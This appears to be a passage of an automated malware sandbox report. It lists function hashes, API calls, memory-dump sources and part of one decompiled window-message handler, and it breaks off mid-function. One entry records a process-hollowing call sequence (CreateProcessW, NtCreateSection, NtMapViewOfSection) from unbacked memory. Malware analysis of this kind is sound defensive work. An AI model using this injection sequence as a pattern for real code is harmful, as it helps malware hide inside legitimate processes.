Opcode Fuzzy Hash: 3cdff1dca6347fd574330d83dde56f8536fcea3ee633be4503939d3ce71b5738
Instruction Fuzzy Hash: BAF0F93470127DB6CB20AA55FD059DF7BA89F00354F90402FF804A2691EFF88A8082EC

Uniqueness

Uniqueness Score: -1.00%

Function 01411EFB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(00000000,00000000,?,?), ref: 01411FEF

Part of subcall function 01411C68: CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 01411D16

Strings

d, xrefs: 0141201A

Memory Dump Source

Source File: 00000000.00000003.468417124.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: Create$MutexProcess
String ID: d
API String ID: 2089245102-2564639436
Opcode ID: 55f4902233fde1e26cce70f3b023e41808e665511c747be7e573a5810036b90b
Instruction ID: fdf808e616c67c457a84bf026d58b123bb06047f73999a8b0dee86b7fd67c055
Opcode Fuzzy Hash: 55f4902233fde1e26cce70f3b023e41808e665511c747be7e573a5810036b90b
Instruction Fuzzy Hash: EA41623615C381A9E2108FA0D811B7B77A5EF84B20F105D0FFA88CB1E0E6B28684C75B

Uniqueness

Uniqueness Score: -1.00%

Function 004664FF, Relevance: 3.2, APIs: 2, Instructions: 216COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004665D3
_memmove.LIBCMT ref: 004665F1

Part of subcall function 0046675A: _memmove.LIBCMT ref: 004667E8

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 6908ea9ac848eaa4e3404a7a43a38a60894cad5f58f1fbbae6fea13ce27134d4
Instruction ID: 22bf93401d6e6b5374a973d4e381dc42914bbd876f3749e824b38a5223a58d4c
Opcode Fuzzy Hash: 6908ea9ac848eaa4e3404a7a43a38a60894cad5f58f1fbbae6fea13ce27134d4
Instruction Fuzzy Hash: 1E71D3702002049FCB249F19E555BBB77A5EF84318F26851FEC965B392EB3DAC01CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00407BB1, Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407C0B
_memmove.LIBCMT ref: 00407C76

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: a49f6a72ca7f77b6d270d55d2c108f2dba7a3da5ef38cfb0801bcd6913d24b62
Instruction ID: dca2659d15994c90c6c09ac9109f1b02cf59a28755a4f5d1953427ae19ac93cb
Opcode Fuzzy Hash: a49f6a72ca7f77b6d270d55d2c108f2dba7a3da5ef38cfb0801bcd6913d24b62
Instruction Fuzzy Hash: 2F31D3B1A08506AFD714CF28D881E6AB3A8FF48314715823EE915CB391EB74F851CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004044CB, Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004044F7
Shell_NotifyIconW.SHELL32(00000002,?), ref: 00404527

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: ac2a13c6f0c01d9b215a3ce1ee2be3118a222f441a63ac74946bf76e6773bc3a
Instruction ID: e840f2ebf72c3f148597409d5332e7061cc792e944fbf6b5e762255698f6f5ec
Opcode Fuzzy Hash: ac2a13c6f0c01d9b215a3ce1ee2be3118a222f441a63ac74946bf76e6773bc3a
Instruction Fuzzy Hash: C8F082719043189BD7929B649C45B9677BC970170CF0041FAAB0896296DB790B88CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3F0, Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d37454ee2cb98cd2eda6e639aa3c1cc12a49c3238b7b79fd2051e68ec030098
Instruction ID: 5b17a682669dec69849c2be44c7345d10b719873665e3f46a0f7cbcbf9803b25
Opcode Fuzzy Hash: 9d37454ee2cb98cd2eda6e639aa3c1cc12a49c3238b7b79fd2051e68ec030098
Instruction Fuzzy Hash: A261BF70600206AFDB20DF54C981B6BB7F4EF44304F14843EE906A7682E779ED56CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040766F, Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0040774A

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: e19ecbf79ffa0ff55efb416b8e1f19c367448c4f4572ed2c684e2207eccbe238
Instruction ID: 148bf7845b9bfd5bb1bd6289e710206c27fb0d1581dedbb952c856e9d84f120b
Opcode Fuzzy Hash: e19ecbf79ffa0ff55efb416b8e1f19c367448c4f4572ed2c684e2207eccbe238
Instruction Fuzzy Hash: 5131D475A08A12DFC7249F19D190922F7A0FF08360714C53FE84A9B7A1E774F881CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00409E9C, Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47c170fc0f981a20286adc41139cc0a0b66dadf83f942776b2b65225f56da298
Instruction ID: 1ffd045b9f514590a6fcd6abf5905341b82142739105da786546fd95c23ab5f2
Opcode Fuzzy Hash: 47c170fc0f981a20286adc41139cc0a0b66dadf83f942776b2b65225f56da298
Instruction Fuzzy Hash: 3E31C131101201CACB34EF1AC48593BB3A5AF44354B38443FE8C6A66E3CB3DAC81DA8D

Uniqueness

Uniqueness Score: -1.00%

Function 00407CB3, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407D13

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 691215b5fde71f84ba4157909e6c6bd8e9f2b14ba3ae5d5d846b05b691d97e04
Instruction ID: 4f35de3bd7cb32edc3c82026cddc1214cbdb1bf771d77ce34197b3f11daa4a73
Opcode Fuzzy Hash: 691215b5fde71f84ba4157909e6c6bd8e9f2b14ba3ae5d5d846b05b691d97e04
Instruction Fuzzy Hash: 3E21FE71A08609EBEB144F25FC4277A7BB4FF18350F21857FE486D5191EB3894A4874E

Uniqueness

Uniqueness Score: -1.00%

Function 01411C67, Relevance: 1.6, APIs: 1, Instructions: 68nativeprocessCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 01411D16
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 01411D3B
NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 01411D55
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 01411DA0
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 01411DC5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 01411E08

Memory Dump Source

Source File: 00000000.00000003.468417124.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: Section$CreateProcessView$InformationMemoryQueryReadVirtual
String ID:
API String ID: 535407514-0
Opcode ID: ac6777cfa9a3a66d1887918250cde6ac5a8fd5382d1ea9283968dc3f45cdbe55
Instruction ID: 293be28f5435dc8fd7718a6112e440a535dd1bc16565b11e063d9c74d08112fb
Opcode Fuzzy Hash: ac6777cfa9a3a66d1887918250cde6ac5a8fd5382d1ea9283968dc3f45cdbe55
Instruction Fuzzy Hash: 1F21F5B190015CAFDF209FA5CC48EDEBBBCEF89701F40405AEA09E6141D6719A84CB60

Uniqueness

Uniqueness Score: -1.00%

Function 004080D7, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00408109

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8558fdb42f2c65e1c04b59eadec12ec6cea9f286a664cb2020abc6fa86f81254
Instruction ID: b4441142cf99b80b2d67ba7c77d84b031da193006e3293fa0bda36e75fef9bcf
Opcode Fuzzy Hash: 8558fdb42f2c65e1c04b59eadec12ec6cea9f286a664cb2020abc6fa86f81254
Instruction Fuzzy Hash: 35112975200605DFC724DF29E581916B7E9EF49314720882EE88ADB7A2DB36E842CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040B93D, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00441054

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: fae9a2f8d0ea082ee18d34a3c83fe1a168aad4bf9c9115bf8137e923bb0ad937
Instruction ID: 4dd1115ea7666fe92c41e01eff9d5cf7df8d25863bbb134e3335a44a84a9e526
Opcode Fuzzy Hash: fae9a2f8d0ea082ee18d34a3c83fe1a168aad4bf9c9115bf8137e923bb0ad937
Instruction Fuzzy Hash: 4D1130712005567AD709AA31C8809FAF75CFB45344F00053BF959E2161DB38AE55C7D8

Uniqueness

Uniqueness Score: -1.00%

Function 00407F41, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407F82

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 282cde0e7519496ebeb9a313f9179f25e65d441fcca71cf3baea6695a0529a18
Instruction ID: a481b228ba030df6875f9a6dd2da52b06f57c7a09d876ea22ea353c417f4835c
Opcode Fuzzy Hash: 282cde0e7519496ebeb9a313f9179f25e65d441fcca71cf3baea6695a0529a18
Instruction Fuzzy Hash: EB0126B26043027ED3205B39DC02F63BB94AB44760F10863FF51ACB2D1EA79E4008758

Uniqueness

Uniqueness Score: -1.00%

Function 0046794E, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00420FF6: _malloc.LIBCMT ref: 0042100E

Part of subcall function 00420FF6: std::exception::exception.LIBCMT ref: 0042102C
Part of subcall function 00420FF6: __CxxThrowException@8.LIBCMT ref: 00421041

_memset.LIBCMT ref: 00467983

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exception
String ID:
API String ID: 4117793777-0
Opcode ID: 92f3e5bf25a9325dbfa36bd2a9d28331a96c638114c69703f502504059365eb8
Instruction ID: 10ff6be5ea8d3f30a203d17d41b502bc39334fe05faf781cb8e6dd50d084f980
Opcode Fuzzy Hash: 92f3e5bf25a9325dbfa36bd2a9d28331a96c638114c69703f502504059365eb8
Instruction Fuzzy Hash: 3201E4742442109FD324EF5DD541B06BBE1AF59314F25845EF5888B392DABAA8008F99

Uniqueness

Uniqueness Score: -1.00%

Function 00422E84, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

Part of subcall function 00423457: __lock.LIBCMT ref: 00423459

__onexit_nolock.LIBCMT ref: 00422EA0

Part of subcall function 00422EC8: RtlDecodePointer.NTDLL(?,00000000,00000000,?,?,00422EA5,0043B80A,004BBB50), ref: 00422EDB
Part of subcall function 00422EC8: DecodePointer.KERNEL32(?,?,00422EA5,0043B80A,004BBB50), ref: 00422EE6
Part of subcall function 00422EC8: __realloc_crt.LIBCMT ref: 00422F27
Part of subcall function 00422EC8: __realloc_crt.LIBCMT ref: 00422F3B
Part of subcall function 00422EC8: EncodePointer.KERNEL32(00000000,?,?,00422EA5,0043B80A,004BBB50), ref: 00422F4D
Part of subcall function 00422EC8: EncodePointer.KERNEL32(0043B80A,?,?,00422EA5,0043B80A,004BBB50), ref: 00422F5B
Part of subcall function 00422EC8: EncodePointer.KERNEL32(00000004,?,?,00422EA5,0043B80A,004BBB50), ref: 00422F67

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
String ID:
API String ID: 3536590627-0
Opcode ID: 5423742800dbc448c71c8d6bfe4f4ff85094c52899ee709eb2b355d99b1223d1
Instruction ID: f207784aada5af0f3cc3895614f4e00c177949023b405da7f69b76f51c94afcb
Opcode Fuzzy Hash: 5423742800dbc448c71c8d6bfe4f4ff85094c52899ee709eb2b355d99b1223d1
Instruction Fuzzy Hash: 01D0C271F0122CAACB10BBE6A90275C7A706F0072BFD0414EF010A60C2CBFC06015B99

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0048CDAC, Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0048CDAC(void* __ebx, struct HWND__* _a4, int _a8, long _a12) {
				intOrPtr _v24;
				long _v52;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v84;
				long _v92;
				void* _v96;
				signed int _v108;
				int _v112;
				void* _v116;
				struct HWND__** _v120;
				intOrPtr _v124;
				long _v128;
				signed int _v132;
				int _v136;
				void* _v140;
				char _v144;
				struct HWND__* _v148;
				struct tagPOINT _v156;
				struct tagPOINT _v164;
				signed int _v165;
				signed int _v168;
				signed int _v172;
				long _v176;
				void* __edi;
				signed int _t221;
				signed int _t223;
				long _t224;
				intOrPtr _t226;
				signed int _t228;
				signed int _t229;
				signed int _t232;
				intOrPtr _t233;
				signed int _t236;
				intOrPtr _t239;
				signed int _t242;
				intOrPtr _t244;
				intOrPtr _t251;
				intOrPtr _t254;
				signed int _t258;
				intOrPtr _t261;
				signed int _t271;
				intOrPtr _t273;
				intOrPtr _t275;
				long _t279;
				intOrPtr _t282;
				signed int _t288;
				signed int _t291;
				intOrPtr _t293;
				signed int _t295;
				signed int _t303;
				intOrPtr _t306;
				signed int _t310;
				long _t318;
				signed int _t341;
				intOrPtr _t342;
				intOrPtr _t347;
				intOrPtr _t352;
				signed int _t357;
				signed int _t359;
				short _t362;
				short _t363;
				short _t365;
				signed int _t367;
				struct HWND__* _t374;
				signed int _t375;
				long _t376;
				intOrPtr _t383;
				intOrPtr _t385;
				intOrPtr _t387;
				intOrPtr _t388;
				intOrPtr _t390;
				long _t393;
				struct HMENU__* _t395;
				signed int _t397;
				struct HMENU__* _t399;
				signed int _t401;
				intOrPtr _t405;
				signed int _t417;
				void* _t418;
				intOrPtr _t419;
				intOrPtr _t420;
				long _t422;
				intOrPtr _t426;
				signed int _t429;
				struct tagPOINT* _t439;
				intOrPtr _t440;
				int _t441;
				long _t443;
				signed int _t444;
				intOrPtr _t445;
				void* _t450;
				void* _t451;

				_t221 = E00402612(0x4c67b0, _a4);
				_t383 =  *0x4c6810; // 0x3886548
				_t422 = _a12;
				_v148 = _t221;
				_t426 =  *((intOrPtr*)( *((intOrPtr*)(_t383 + _t221 * 4))));
				_t385 =  *((intOrPtr*)(_t422 + 8));
				_v124 = _t426;
				_t450 = _t385 - 0xfffffe6e;
				if(_t450 > 0) {
					__eflags = _t385 - 0xfffffff0;
					if(__eflags > 0) {
						__eflags = _t385 - 0xfffffff4;
						if(_t385 == 0xfffffff4) {
							_t223 = E004025DB(0x4c67b0,  *_t422);
							_v168 = _t223;
							__eflags = _t223 - 0xffffffff;
							if(_t223 == 0xffffffff) {
								L12:
								_t224 = DefDlgProcW(_a4, 0x4e, _a8, _t422);
								L13:
								return _t224;
							}
							_t387 =  *0x4c6824; // 0xc29938
							_t388 =  *((intOrPtr*)( *((intOrPtr*)(_t387 + _t223 * 4))));
							_t226 =  *((intOrPtr*)(_t388 + 0x90));
							__eflags = _t226 - 0x10;
							if(_t226 == 0x10) {
								L101:
								_t228 =  *((intOrPtr*)(_t422 + 0xc)) - 1;
								__eflags = _t228;
								if(_t228 == 0) {
									_t224 = 0x20;
									goto L13;
								}
								_t229 = _t228 - 0x10000;
								__eflags = _t229;
								if(_t229 != 0) {
									goto L12;
								}
								__eflags =  *((intOrPtr*)(_t388 + 0x48)) - 0xfe000000;
								_v165 = _t229;
								if( *((intOrPtr*)(_t388 + 0x48)) == 0xfe000000) {
									_v165 = 1;
								}
								_t232 = E00402402(0x4c67b0,  *((intOrPtr*)(_t422 + 0x2c)),  &_v144,  &_v164);
								__eflags = _t232;
								if(_t232 != 0) {
									_t233 =  *0x4c6824; // 0xc29938
									_t429 = _v164.x;
									_t236 = GetWindowLongW( *( *((intOrPtr*)( *((intOrPtr*)(_t233 + _t429 * 4)))) + 0x34), 0xfffffff0);
									__eflags = _t236 & 0x08000000;
									if((_t236 & 0x08000000) != 0) {
										goto L106;
									}
									__eflags =  *(_t422 + 0x28) & 0x00000011;
									_t390 =  *0x4c6824; // 0xc29938
									if(( *(_t422 + 0x28) & 0x00000011) == 0) {
										L110:
										_t239 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t390 + _t429 * 4)))) + 0x4c));
										__eflags = _t239 - 0xffffffff;
										if(_t239 != 0xffffffff) {
											 *((intOrPtr*)(_t422 + 0x30)) = _t239;
											_t390 =  *0x4c6824; // 0xc29938
										}
										_t242 =  *( *((intOrPtr*)( *((intOrPtr*)(_t390 + _t429 * 4)))) + 0x48);
										__eflags = _t242;
										if(_t242 < 0) {
											goto L106;
										} else {
											__eflags = _v165;
											if(_v165 == 0) {
												L115:
												 *(_t422 + 0x34) = _t242;
												goto L106;
											}
											__eflags =  *(_t422 + 0x24) & 0x00000001;
											if(( *(_t422 + 0x24) & 0x00000001) == 0) {
												goto L106;
											}
											goto L115;
										}
									}
									_t244 =  *((intOrPtr*)( *((intOrPtr*)(_t390 + _t429 * 4))));
									__eflags =  *((char*)(_t244 + 0x90)) - 0x14;
									if( *((char*)(_t244 + 0x90)) != 0x14) {
										goto L12;
									}
									goto L110;
								} else {
									L106:
									_t224 = 0;
									goto L13;
								}
							}
							__eflags = _t226 - 0x13;
							if(_t226 != 0x13) {
								goto L12;
							}
							goto L101;
						}
						__eflags = _t385 - 0xfffffffb;
						if(_t385 == 0xfffffffb) {
							_v165 = 0;
							E00402344(0x4c67b0, _t426, 1);
							GetCursorPos( &_v164);
							ScreenToClient( *_t422,  &_v164);
							_t393 = E004025DB(0x4c67b0,  *_t422);
							_v172 = _t393;
							_v176 = _t393;
							__eflags = _t393 - 0xffffffff;
							if(_t393 != 0xffffffff) {
								L79:
								_t251 =  *0x4c6824; // 0xc29938
								_v148 = _t393;
								_t254 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t251 + _t393 * 4)))) + 0x90));
								__eflags = _t254 - 0x10;
								if(_t254 == 0x10) {
									_v140 = _v156.x;
									_v136 = _v156.y;
									_t258 = SendMessageW( *_t422, 0x1111, 0,  &_v140);
									__eflags = _t258;
									if(_t258 == 0) {
										L96:
										ClientToScreen( *_t422,  &_v156);
										_t261 =  *0x4c6824; // 0xc29938
										_t395 =  *( *((intOrPtr*)( *((intOrPtr*)(_t261 + _v164.y * 4)))) + 0xc);
										__eflags = _t395;
										if(_t395 == 0) {
											goto L12;
										}
										TrackPopupMenuEx(_t395, 0x80, _v156.x, _v156.y,  *_v120, 0);
										L37:
										_t224 = 1;
										goto L13;
									}
									_v92 = _t258;
									_v96 = 4;
									SendMessageW( *_t422, 0x113e, 0,  &_v96);
									__eflags = _v132 & 0x00000046;
									if((_v132 & 0x00000046) == 0) {
										goto L96;
									}
									_t271 = E00402402(0x4c67b0, _v60,  &_v144,  &_v164);
									__eflags = _t271;
									if(_t271 == 0) {
										L95:
										_v164.y = _v148;
										goto L96;
									}
									_t397 = _v164.x;
									_t273 =  *0x4c6824; // 0xc29938
									_v164.y = _t397;
									_t275 =  *((intOrPtr*)( *((intOrPtr*)(_t273 + _t397 * 4))));
									__eflags =  *(_t275 + 0xc);
									if( *(_t275 + 0xc) != 0) {
										goto L96;
									}
									goto L95;
								}
								__eflags = _t254 - 0x13;
								if(_t254 != 0x13) {
									goto L12;
								}
								_v116 = _v156.x;
								_v112 = _v156.y;
								_t279 = SendMessageW( *_t422, 0x1012, 0,  &_v116);
								__eflags = _t279 - 0xffffffff;
								if(_t279 <= 0xffffffff) {
									L89:
									ClientToScreen( *_t422,  &_v156);
									_t282 =  *0x4c6824; // 0xc29938
									_t399 =  *( *((intOrPtr*)( *((intOrPtr*)(_t282 + _v164.y * 4)))) + 0xc);
									__eflags = _t399;
									if(_t399 != 0) {
										TrackPopupMenuEx(_t399, 0, _v156.x, _v156.y,  *_v120, 0);
									}
									goto L12;
								}
								__eflags = _v165;
								if(_v165 != 0) {
									goto L89;
								}
								_v52 = _t279;
								_v56 = 4;
								_t288 = SendMessageW( *_t422, 0x104b, 0,  &_v56);
								__eflags = _t288;
								if(_t288 == 0) {
									goto L12;
								}
								__eflags = _v108 & 0x0000000e;
								if((_v108 & 0x0000000e) == 0) {
									goto L89;
								}
								_t291 = E00402402(0x4c67b0, _v24,  &_v144,  &_v164);
								__eflags = _t291;
								if(_t291 == 0) {
									L88:
									_v164.y = _v148;
									goto L89;
								}
								_t401 = _v164.x;
								_t293 =  *0x4c6824; // 0xc29938
								_v164.y = _t401;
								_t295 =  *( *(_t293 + _t401 * 4));
								__eflags = _t295;
								if(_t295 == 0) {
									goto L88;
								}
								__eflags =  *(_t295 + 0xc);
								if( *(_t295 + 0xc) != 0) {
									goto L89;
								}
								goto L88;
							}
							_t393 = E004025DB(0x4c67b0, GetParent( *_t422));
							_v164.x = _t393;
							_v168 = _t393;
							__eflags = _t393 - 0xffffffff;
							if(_t393 == 0xffffffff) {
								goto L12;
							}
							_v165 = 1;
							goto L79;
						}
						__eflags = _t385 - 0xfffffffe;
						if(_t385 != 0xfffffffe) {
							goto L12;
						}
						E00402344(0x4c67b0, _t426, 1);
						GetCursorPos( &_v164);
						ScreenToClient( *_t422,  &_v164);
						_t303 = E004025DB(0x4c67b0,  *_t422);
						__eflags = _t303 - 0xffffffff;
						if(_t303 == 0xffffffff) {
							goto L12;
						}
						_t405 =  *0x4c6824; // 0xc29938
						_t306 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t405 + _t303 * 4)))) + 0x90));
						__eflags = _t306 - 0x10;
						if(_t306 < 0x10) {
							goto L12;
						}
						__eflags = _t306 - 0x11;
						if(_t306 <= 0x11) {
							_v140 = _v156.x;
							_v136 = _v156.y;
							_t310 = SendMessageW( *_t422, 0x1111, 0,  &_v140);
							__eflags = _t310;
							if(_t310 != 0) {
								_v92 = _t310;
								_v96 = 0xc;
								_v84 = 0xf000;
								SendMessageW( *_t422, 0x113e, 0,  &_v96);
								__eflags = _v132 & 0x00000046;
								if((_v132 & 0x00000046) != 0) {
									SendMessageW( *_t422, 0x110b, 9, 0);
									SendMessageW( *_t422, 0x110b, 9, _v128);
								}
							}
							goto L12;
						}
						__eflags = _t306 - 0x13;
						if(_t306 != 0x13) {
							goto L12;
						}
						_v116 = _v156;
						_v112 = _v156.y;
						_t318 = SendMessageW( *_t422, 0x1012, 0,  &_v116);
						__eflags = _t318 - 0xffffffff;
						if(_t318 == 0xffffffff) {
							goto L12;
						}
						_v52 = _t318;
						_v56 = 4;
						SendMessageW( *_t422, 0x104b, 0,  &_v56);
						__eflags = _v108 & 0x0000000e;
						if((_v108 & 0x0000000e) == 0) {
							goto L12;
						}
						_push(0);
						_push(_v24);
						L45:
						E0048B60B();
						goto L12;
					}
					if(__eflags == 0) {
						ReleaseCapture();
						goto L12;
					}
					__eflags = _t385 - 0xfffffec0;
					if(_t385 == 0xfffffec0) {
						L61:
						InvalidateRect( *_t422, 0, 1);
						goto L12;
					}
					__eflags = _t385 - 0xfffffed4;
					if(_t385 == 0xfffffed4) {
						goto L61;
					}
					__eflags = _t385 - 0xffffff93;
